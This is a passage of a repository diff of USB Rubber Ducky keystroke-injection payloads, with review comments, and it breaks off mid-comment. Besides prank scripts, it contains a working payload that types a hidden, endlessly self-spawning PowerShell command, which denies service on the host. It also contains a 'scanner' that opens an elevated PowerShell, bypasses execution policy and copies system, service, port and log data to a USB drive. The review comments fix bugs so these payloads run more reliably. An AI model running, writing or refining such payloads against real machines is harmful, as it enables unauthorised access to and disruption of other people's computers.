IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Test done
END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No numlock LED
ENTER
STRING Prediciton: ChromeOS
END_IF_DEFINED
$_OS = CHROMEOS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Numlock LED on
ENTER
STRING Testing scrolllock
END_IF_DEFINED
SCROLLLOCK
DELAY #HOST_RESPONSE_TIMEOUT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Test done
END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Scrolllock LED on
ENTER
STRING Prediciton: Android
END_IF_DEFINED
$_OS = ANDROID
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No scrolllock reply
ENTER
STRING Prediction: Linux
END_IF_DEFINED
$_OS = LINUX
END_IF
END_IF
END_IF
ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Caps LED on
ENTER
STRING Prediction: iOS
END_IF_DEFINED
$_OS = IOS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No caps reply
ENTER
STRING Prediction: MacOS
END_IF_DEFINED
$_OS = MACOS
END_IF
ELSE IF ($_OS == WINDOWS) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Confident Windows Prediction
END_IF_DEFINED
$_OS = WINDOWS
END_IF
END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING OS_DETECT complete
ENTER
END_IF_DEFINED
END_FUNCTION
END_EXTENSION
EXTENSION HELLO_OS_UBER
REM VERSION 2.0
REM AUTHOR: Korben and UberGuidoZ
REM_BLOCK DOCUMENTATION
USAGE:
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
after DETECT_OS_UBER() prints the OS determination. Make sure
your custom conditional code is inserted below where commented.
END_REM
REM Defining custom $_OS enums if desired
DEFINE #EXTRA_EXAMPLES FALSE
DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS_UBER()
IF ($_OS == WINDOWS) THEN
REM Windows code starts here
DELAY 1000
GUI r
DELAY 500
STRINGLN notepad
DELAY 1000
STRINGLN Legit DS3 on Windows
REM Windows code ends here
ELSE IF ($_OS == MACOS) THEN
REM macOS code starts here
DELAY 2000
GUI SPACE
DELAY 500
STRINGLN TextEdit
STRINGLN Legit DS3 on macOS
REM macOS code ends here
ELSE IF ($_OS == LINUX) THEN
REM Linux code starts here
DELAY 2000
CTRL ALT t
DELAY 100
STRINGLN nano
STRINGLN Legit DS3 on Linux
REM Linux code ends here
ELSE IF ($_OS == IOS) THEN
REM iOS code starts here
REM iOS code ends here
ELSE IF ($_OS == CHROMEOS) THEN
REM ChromeOS code starts here
REM ChromeOS code ends here
ELSE IF ($_OS == ANDROID) THEN
REM Android code starts here
REM Android code ends here
IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Custom Other OS code starts here
REM Custom Other OS code ends here
ELSE IF($_OS == #ANOTHER_OS) THEN
REM Another custom Other OS code starts here
REM Another custom Other OS code ends here
END_IF_DEFINED
ELSE
REM All else fails code starts here
REM All else fails code ends here
END_IF
END_FUNCTION
END_EXTENSION
REM Do the do! Change delay at beginning if desired.
DETECT_OS_UBER()
DELAY #EXECUTE_DELAY
HELLO_OS_UBER()
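Review bot: three debug strings misspell "Prediction" as "Prediciton" (`STRING Prediciton: MacOS`, `STRING Prediciton: ChromeOS`, `STRING Prediciton: Android`). `IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN` is the only condition in the file without parentheses; match the `IF (...) THEN` form used everywhere else. `$_OS = WINDOWS` inside the `ELSE IF ($_OS == WINDOWS)` branch is a no-op and can go. Version fields disagree: the payload header says `REM Version: 1.6` while both extensions say `REM VERSION 2.0`. In the HELLO_OS_UBER documentation, "OS_DETECTION_UBERExtension" is missing a space. Since `#DEBUGGING_OUTPUT TRUE` types text into whatever window has focus, the DEBUGGING note should say so plainly rather than just "with text editor open".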


@ -0,0 +1,66 @@
# Create RickRoll Contact - iOS
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
### Details
- **Title**: Create RickRoll Contact
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: iOS devices
### Dependencies
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
```
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
```
- Other optional DEFINEs
```
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
```
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
If you want to remove the zip contact info, you should change this one piece of code from this...
```
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
```
... to this...
```
REM zip
DELAY 250
REM STRING #CONTACT-ZIP
TAB
```
In this way you are going to ignore this step but without altering the proper flow of available information.
### How It Works
1. Sets a user-defined options.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Contacts**.
- Executes some commands to sets the new contact information
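Review bot: the Dependencies section should say up front that every optional DEFINE left at its default `example` is typed verbatim into the contact (company, e-mail, website, birthday, address), because the payload runs each `STRING #CONTACT-...` unconditionally; the comment-out workaround is described only after the list and depends on keeping the surrounding `TAB` lines intact. Wording: "for istance" should be "for instance", "Sets a user-defined options" should be "Sets user-defined options", "littebit" should be "little bit", and "to sets the new contact information" should be "to set".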


@ -0,0 +1,135 @@
REM_BLOCK
############################################
# #
# Title : Create RickRoll Contact #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : iOS #
# #
############################################
END_REM
REM @@@ START MANDATORY DEFINEs @@@
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
REM @@@ START OPTIONAL DEFINEs @@@
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
REM @@@ START PAYLOAD @@@
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN #CONTACTS-APP-NAME
DELAY 500
GUI n
REM name
DELAY 250
STRING #CONTACT-NAME
TAB
REM last name
DELAY 250
STRING #CONTACT-LAST-NAME
TAB
REM company
DELAY 250
STRING #CONTACT-COMPANY
TAB
REM phone number
DELAY 250
STRING #CONTACT-PHONE-NUMBER
TAB
TAB
REM mail
DELAY 250
STRING #CONTACT-E-MAIL
TAB
TAB
REM url
DELAY 250
STRING #CONTACT-WEBSITE-URL
TAB
TAB
REM birthday
DELAY 250
STRING #CONTACT-BIRTHDAY
TAB
TAB
REM street
DELAY 250
STRING #CONTACT-STREET
TAB
REM city
DELAY 250
STRING #CONTACT-CITY
TAB
REM state
DELAY 250
STRING #CONTACT-STATE
TAB
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
REM country/region
DELAY 250
STRING #CONTACT-COUNTRY
TAB
GUI q
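Review bot: the optional DEFINEs (`#CONTACT-COMPANY example` through `#CONTACT-COUNTRY example`) are typed unconditionally, so an unedited payload creates a contact whose company, e-mail, website, birthday and address all read "example"; the README's advice to comment out individual `STRING` lines is fragile because the `TAB` sequence after each field must be preserved exactly. `STRING #CONTACT-BIRTHDAY` types free text into the birthday field; whether iOS Contacts accepts typed text there should be verified before shipping it in the defaults. The REM_BLOCK says `Target : iOS` but, like `GUI SPACE` and `GUI n`, the whole flow presupposes a hardware-keyboard context, which neither header nor README states.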


@ -3,10 +3,10 @@ REM Title: Hacker Typer
REM Author: UberGuidoZ
REM Description: Opens a harmless website and types like a hacker
REM Target: Windows but easily modified to work on any OS with a browser
REM Version: 1.0
REM Version: 1.1
REM Category: Prank
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
REM
ATTACKMODE HID STORAGE
DELAY 1500
GUI r
DELAY 1000
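Review bot: the added `ATTACKMODE HID STORAGE` exposes the Ducky's mass-storage partition to the host, but nothing in this payload reads or writes storage; `ATTACKMODE HID` is sufficient and avoids mounting a drive on the target for no reason. The bump from `REM Version: 1.0` to `1.1` is the only other change, so the header should record what changed rather than the commit message's "for good measure".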


@ -5,9 +5,10 @@ REM
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
REM Notes: Creates batch file, starts batch file, minimizes the window
REM Target: Windows but fairly easily modified to work on any OS with a browser
REM Version: 1.3
REM Version: 1.5
REM Category: Prank
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
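Review bot: `REM Version: 1.3` jumps to `1.5` in a single change with no note of what the two increments cover; either record the changes in the header or bump once. As in the Hacker Typer file, `ATTACKMODE HID STORAGE` mounts storage this payload never touches; `ATTACKMODE HID` is the minimal mode.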
@ -20,6 +21,7 @@ DELAY 1000
STRING copy con rr.bat
ENTER
STRING @ECHO OFF
ENTER
STRING PING 127.0.0.1 -n 5 > NUL
ENTER
STRING :LOOP
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
ENTER
STRING GOTO LOOP
ENTER
CTRL C
CTRL c
DELAY 1000
STRING cls && rr.bat
ENTER
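Review bot: `CTRL C` to `CTRL c` matches the commit message "Changed capital C to lowercase to appease DS3", but that reason belongs in a `REM` beside the line, otherwise a later contributor will change it back. Separately, this keystroke is what ends the `copy con rr.bat` block started two hunks earlier; `copy con` is normally terminated with Ctrl+Z followed by Enter, so confirm on a test machine that Ctrl+C actually leaves `rr.bat` with the intended content before `cls && rr.bat` runs it.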


@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
REM Author: UberGuidoZ
REM Target: Windows (including Powershell 2.0 or above)
REM Version: v1.1
ATTACKMODE HID STORAGE
DELAY 3000
GUI r
DELAY 750
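Review bot: `ATTACKMODE HID STORAGE` is added here without touching `REM Version: v1.1`, whereas the Hacker Typer and Rick Roll files in the same change raise their versions for the identical edit; be consistent. As in those files, the payload never uses storage, so `ATTACKMODE HID` is the minimal mode.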


@ -0,0 +1,23 @@
# Windows Spam Terminals
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
### Details
- **Title**: Windows Spam Terminals
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: Windows
### Dependencies
This payload is plug and play <3
## How It Works 📜
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
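Review bot: step 1 says PASSIVE_WINDOWS_DETECT is used "to detect when the device is ready", but that extension's purpose is to set `$_OS`, and the payload hunk never branches on it, so the README should not imply the payload is gated on Windows. Step 2 needs agreement fixes: "the script execute a powershell script that create" should read "the script executes a PowerShell command that creates". The warning paragraph is appropriate, but "Prank" understates a payload that spawns PowerShell processes without bound, which is a denial of service on the host. Heading levels: `### Dependencies` then `## How It Works` inverts the hierarchy, and "This payload is plug and play <3" is a stray emoticon in a Dependencies section.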


@ -0,0 +1,58 @@
REM_BLOCK
############################################
# #
# Title : Windows Spam Terminals #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows #
# #
############################################
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
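Review bot: `$_OS` is computed by the inline PASSIVE_WINDOWS_DETECT extension but never consulted: the final `GUI r`, `DELAY 500` and STRINGLN run regardless of whether the host was detected as Windows, so on any other host the payload still types the command into whatever has focus. Wrap those three lines in `IF ($_OS == WINDOWS) THEN ... END_IF`, exactly as the extension's own EXAMPLE USAGE block shows; the README's statement that the extension detects readiness then also covers the OS check. A REM above the STRINGLN describing the command (a hidden outer loop via `-w h`, each iteration spawning nested PowerShell instances) would let a reviewer understand the nested quoting at a glance.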

View File

@ -0,0 +1,629 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000
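Review bot: `invoke-command -scriptblock $script` on the last typed line references `$script`, which is never assigned anywhere in this file; every STRING line above it is typed directly into the elevated console and executed there, inside the `if ($usbDrive) {` block, so this line only produces a parameter-binding error and should be removed. Further points, in order of impact. The CVE lookup in check-cve uses the NVD 1.0 endpoint (`https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=`), which NIST retired in 2023; the 2.0 API (`/rest/json/cves/2.0?keywordSearch=`) returns `vulnerabilities[].cve.id` and `cve.descriptions[].value`, so both the URI and the property paths (`result.cve_items`, `cve_data_meta.id`, `description.description_data[0].value`) need updating, and the 2.0 API rate-limits unauthenticated callers, so the retry branch stays relevant. The software list is built from `Get-Process` names and scheduled-task executables and then matched with `$_.DisplayName -eq $software` against the uninstall registry; a process name such as `chrome` never equals a display name such as `Google Chrome`, so `$version` is null for almost every entry and check-cve rarely runs. Both check-softwarevulnerabilities and that loop read only `hklm:\software\wow6432node\...\uninstall\*`, which lists 32-bit installs; 64-bit applications live under `HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall` and are missed. `$initialDelay = 2` is declared inside check-cve and is function-local, so the `$initialDelay += (Get-Random ...)` in the top-level loop starts from an undefined variable rather than from 2. The header comment says the USB is needed "to save credentials to"; the script writes audit output (results.txt and WindowsUpdate.log), so the header should say results. The closing `}` of the `if ($usbDrive) {` block relies on the console executing the block as soon as it parses complete (PSReadLine behaviour); on a host without PSReadLine a blank ENTER is needed after it, otherwise nothing runs. Style: `Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\..."` hard-codes the profile location and should use 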